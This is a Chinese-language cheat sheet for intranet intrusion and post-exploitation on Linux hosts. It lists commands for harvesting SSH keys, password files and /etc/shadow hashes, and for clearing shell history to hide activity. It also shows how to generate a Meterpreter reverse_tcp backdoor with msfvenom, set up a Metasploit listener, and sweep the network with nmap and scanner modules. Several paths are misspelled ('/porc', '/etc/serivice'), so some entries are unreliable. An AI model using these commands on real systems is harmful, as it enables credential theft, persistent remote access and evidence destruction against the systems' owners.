Linux 内网本机信息收集速查

系统类型

1
2
cat /etc/issue
查看系统名称

网络信息收集

1
2
3
4
5
6
last                                    多数运维会接入内网登录系统,这时候,便可获取部分内网ip 进而对内网IP段进行画像
Route -n                                内网路由情况,也能为内网网络拓扑提供一定的信息
IPtables                                防火墙情况,有时候会存在内网网络通行规则,也能提供一定信息

历史命令!
/root/.bash_history

直接命令搜敏感文件收集

1
2
3
4
grep "password:" * -Rn
find / -name "config.*"
find / -name "databases.*"
find / -name "config.*" | xargs grep "password""

常用敏感文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数

内核版本

1
uname –a 查看所有信息

用户

1
2
3
4
whoami
id
cat /etc/passwd #查看用户列表
cat /etc/shadow #获取用户hash

进程

1
ps aux 查看进程信息

网卡

1
2
3
4
/etc/network/interfaces #网卡信息
ifconfig
route #查看路由
arp -a #查看缓存的地址解析情况

服务信息

1
2
cat /etc/serivice #查看存在的服务
cat /etc/serices | grep ** #查看对应服务

服务配置

1
2
3
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf

日志信息

1
2
3
4
/var/log
/var/log/apache2/access.log #http日志
/var/log/mysql/error.log #mysql日志
/var/log/apt/history.log #apt日志

历史命令

1
2
3
4
 ~/.bash_history
echo > .bash_history #上述文件类日志删除
history #命令操作历史
history -c #删除

软件信息

1
2
dpkg -l #查看安装的软件包
rpm -qa #查看安装的软件包

关键信息收集

历史命令!

1
/root/.bash_history

本地保存的ssh密钥

1
/root/.ssh/id_rsa

LINUX后门生成

1.示例指令:

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

2.配置Metasploitexploit监听

1
2
3
4
5
6
search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

nmap扫描:

1
nmap ‐sP ‐PI 192.168.1.0/24 ‐T4

端口扫描

auxiliary/scanner/portscan
scanner/portscan/ack ACK防火墙扫描
scanner/portscan/ftpbounce FTP跳端口扫描
scanner/portscan/syn SYN端口扫描
scanner/portscan/tcp TCP端口扫描
scanner/portscan/xmas TCP”XMas”端口扫描

SMB扫描

scanner下模块,辅助发现内网存活主机,分别为:

  • auxiliary/scanner/discovery/arp_sweep

  • auxiliary/scanner/discovery/udp_sweep

  • auxiliary/scanner/ftp/ftp_version

  • auxiliary/scanner/http/http_version

  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version

  • auxiliary/scanner/telnet/telnet_version

  • auxiliary/scanner/discovery/udp_probe

  • auxiliary/scanner/dns/dns_amp

  • auxiliary/scanner/mysql/mysql_version

  • auxiliary/scanner/netbios/nbname

  • auxiliary/scanner/http/title

  • auxiliary/scanner/db2/db2_version

  • auxiliary/scanner/portscan/ack

  • auxiliary/scanner/portscan/tcp